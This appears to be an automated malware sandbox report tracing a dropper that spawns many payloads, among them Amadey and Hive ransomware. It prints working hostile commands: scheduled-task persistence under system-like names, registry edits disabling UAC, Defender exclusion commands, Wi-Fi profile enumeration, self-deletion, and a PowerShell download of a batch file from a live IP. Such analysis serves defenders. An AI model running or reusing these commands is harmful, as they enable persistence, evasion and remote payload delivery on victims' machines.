PID 228 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
PID 6056 wrote to memory of 5272 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\1989129625.exe
PID 6056 wrote to memory of 5272 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\1989129625.exe
PID 5272 wrote to memory of 5468 N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe C:\Windows\System32\cmd.exe
PID 5272 wrote to memory of 5468 N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe C:\Windows\System32\cmd.exe
PID 5272 wrote to memory of 5812 N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe C:\Windows\System32\cmd.exe
PID 5272 wrote to memory of 5812 N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe C:\Windows\System32\cmd.exe
PID 5468 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 5468 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 5812 wrote to memory of 2028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5812 wrote to memory of 2028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 6056 wrote to memory of 5620 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\2309417675.exe
PID 6056 wrote to memory of 5620 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\2309417675.exe
PID 6056 wrote to memory of 5620 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\2309417675.exe
PID 228 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\build555.exe
PID 228 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\build555.exe
PID 1888 wrote to memory of 5684 N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 1888 wrote to memory of 5684 N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 1888 wrote to memory of 5684 N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 228 wrote to memory of 5788 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe
PID 228 wrote to memory of 5788 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe
PID 1888 wrote to memory of 5684 N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe

"C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe"

C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe" "Server1.exe" ENABLE

C:\Windows\System32\certutil.exe

"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmpE0EC.tmp"

C:\Users\Admin\AppData\Local\Temp\Files\test14.exe

"C:\Users\Admin\AppData\Local\Temp\Files\test14.exe"

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\Files\pp.exe

"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"

C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe

"C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"

C:\Users\Admin\AppData\Local\Temp\2910514938.exe

C:\Users\Admin\AppData\Local\Temp\2910514938.exe

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe"

C:\Users\Admin\AppData\Local\Temp\1989129625.exe

C:\Users\Admin\AppData\Local\Temp\1989129625.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Users\Admin\AppData\Local\Temp\2309417675.exe

C:\Users\Admin\AppData\Local\Temp\2309417675.exe

C:\Users\Admin\AppData\Local\Temp\Files\build555.exe

"C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe"

C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe

"C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe"

C:\Users\Admin\AppData\Local\snails\ectosphere.exe

"C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"

C:\Users\Admin\AppData\Local\snails\ectosphere.exe

"C:\Users\Admin\AppData\Local\snails\ectosphere.exe"

C:\Users\Admin\AppData\Local\Temp\262965725.exe

C:\Users\Admin\AppData\Local\Temp\262965725.exe

C:\Users\Admin\AppData\Local\Temp\Files\steel.exe

"C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"

C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe

"C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"

C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp" /SL5="$7021A,3924197,54272,C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "video_minimizer_12125"

C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe

"C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe" -i

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe

"C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe"

C:\Users\Admin\AppData\Local\Temp\281730318.exe

C:\Users\Admin\AppData\Local\Temp\281730318.exe

C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe

"C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\BKKFCFBKFCFB" & exit

C:\Users\Admin\AppData\Local\Temp\3161510603.exe

C:\Users\Admin\AppData\Local\Temp\3161510603.exe

C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\Files\test26.exe

"C:\Users\Admin\AppData\Local\Temp\Files\test26.exe"

C:\Users\Admin\AppData\Local\Temp\Files\clip.exe

"C:\Users\Admin\AppData\Local\Temp\Files\clip.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\Temp\Files\random.exe

"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"

C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe

"C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe"

C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe

"C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe"

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

"C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & rd /s /q "C:\ProgramData\JKEGDHCFCAAE" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\dwm.exe

C:\Windows\System32\dwm.exe

C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe

"C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe"

C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe

"C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SOCpyMZT5RRL.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"

C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe

"C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe

"C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\svhost\svhost.exe

"C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe'

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yoo8U08jApyH.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\Files\ama.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"

C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe

"C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe"

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"

C:\Users\Admin\AppData\Local\Temp\Files\builder.exe

"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"

C:\Windows\SysWOW64\fontdrvhost.exe

"C:\Windows\System32\fontdrvhost.exe"

C:\Users\Admin\AppData\Local\Temp\Files\crack.exe

"C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"

C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe

"C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe"

C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe

"C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5604 -ip 5604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9021.tmp\9022.tmp\9023.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"

C:\Users\Admin\AppData\Local\Temp\Files\4434.exe

"C:\Users\Admin\AppData\Local\Temp\Files\4434.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE

"C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9E3A.tmp\9E3B.tmp\9E3C.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66F5uGiqJAOk.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd2b4a46f8,0x7ffd2b4a4708,0x7ffd2b4a4718

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2476 /prefetch:8

C:\Windows\System32\dwm.exe

C:\Windows\System32\dwm.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

